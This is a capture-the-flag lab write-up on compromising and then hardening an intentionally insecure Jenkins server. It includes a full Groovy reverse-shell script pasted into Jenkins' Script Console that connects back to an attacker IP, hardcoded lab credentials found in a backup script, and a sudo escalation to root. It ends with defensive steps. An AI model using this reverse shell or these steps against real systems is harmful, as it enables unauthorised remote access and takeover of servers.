Today we’re going to explore how the defence in depth strategy can help strengthen the environment’s overall security posture.
Learning Objectives #
- Defence in Depth
- Basic Endpoint Hardening
- Simple Boot2Root Methodology
Overview #
This is my key takeaways from today:
- Jenkins is an open-source automation server widely used in DevOps for building, testing and deploying software applications. It’s default port is 8080.
- Jenkins can execute, via Manage - Script Console, arbitrary scripts for administration/trouble-shooting/diagnostics. This can easily be exploited by running web shells.
Get a web-shell #
In this task we get a freebie, a Jenkins application that’s intentionally insecure. By visiting the site http://10.10.1.143:8080 we are already logged into Jenkins with administration capabilities. Visiting Manage - Script Console we can spawn a web shell. Script Console is a feature that accepts Groovy (a programming language for the Java platform).
We’re going to use a modified version of this script
String host="10.14.42.37";
int port=1886;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Pasting in the code above into the Script Console, and listening with ncat -nvlp 1886, we got a reverse shell as the user jenkins.
PrivEsc #
When looking around for interesting files, I found a file called backup.sh inside /opt/scripts/.
The content of the file is:
#!/bin/sh
mkdir /var/lib/jenkins/backup
mkdir /var/lib/jenkins/backup/jobs /var/lib/jenkins/backup/nodes /var/lib/jenkins/backup/plugins /var/lib/jenkins/backup/secrets /var/lib/jenkins/backup/users
cp /var/lib/jenkins/*.xml /var/lib/jenkins/backup/
cp -r /var/lib/jenkins/jobs/ /var/lib/jenkins/backup/jobs/
cp -r /var/lib/jenkins/nodes/ /var/lib/jenkins/backup/nodes/
cp /var/lib/jenkins/plugins/*.jpi /var/lib/jenkins/backup/plugins/
cp /var/lib/jenkins/secrets/* /var/lib/jenkins/backup/secrets/
cp -r /var/lib/jenkins/users/* /var/lib/jenkins/backup/users/
tar czvf /var/lib/jenkins/backup.tar.gz /var/lib/jenkins/backup/
/bin/sleep 5
username="tracy"
password="13_1n_33"
Ip="localhost"
sshpass -p "$password" scp /var/lib/jenkins/backup.tar.gz $username@$Ip:/home/tracy/backups
/bin/sleep 10
rm -rf /var/lib/jenkins/backup/
rm -rf /var/lib/jenkins/backup.tar.gz
We got a scp command and some credentials for the user tracy, so we can probably ssh into the box as tracy.
PrivEsc to root #
Running sudo -l as tracy, we can see the privilige (ALL : ALL) ALL, meaning we can run everything as root using sudo.
Easy privesc to root running sudo su and we are root!
Defense in Depth #
All the above was a very easy hack, but how can we add defensive layers that aim to work together with each layer making it more complicated for the attackers to achieve their goal?
The first thing we do is remove the user tracy from the sudo group.
sudo deluser tracy sudo.
To confirm we can run sudo -l -U tracy.
The next thing is to harden the SSH.
In this case, we’re going to remove the ability to SSH into the server using passwords.
This is done by editing the /etc/ssh/sshd_config file.
Find #PasswordAuthentication yes and change it to PasswordAuthentication no.
In the same file, look for Include /etc/ssh/sshd_config.d/*.conf and comment it out (by adding a # before Include).
Save the file and run sudo systemctl restart ssh.
We have now disabled the ability to SSH with passwords.
Another pivot point is the password policy. In this box, the passwords where weak and we can apply a stronger password policy.
The last thing to harden in this case is the automatic login on the Jenkins portal.
I’m not going into the details here since it’s a very basic thing to remove the config file and restore the backup..
Questions #
- What is the default port for Jenkins?
Answered above, or google it (something like jenkins default port.
- What is the password of the user tracy?
Found inside the file /opt/scripts/backup.sh
- What’s the root flag?
Run the command sudo su when you’re logged in as tracy (using ssh with above password).
Then cat /root/flag.txt.
- What is the error message when you login as tracy again and try sudo -l after its removal from the sudoers group?
(as root): run the command deluser tracy sudo, log out and back in via ssh.
- What’s the SSH flag?
Found inside /etc/ssh/sshd_config. Easy to find using cat /etc/ssh/sshd_config | grep \#PasswordAuthentication.
- What’s the Jenkins flag?
Found inside /var/lib/jenkins/config.xml.bak, look for the commented section regarding authorizationStrategy.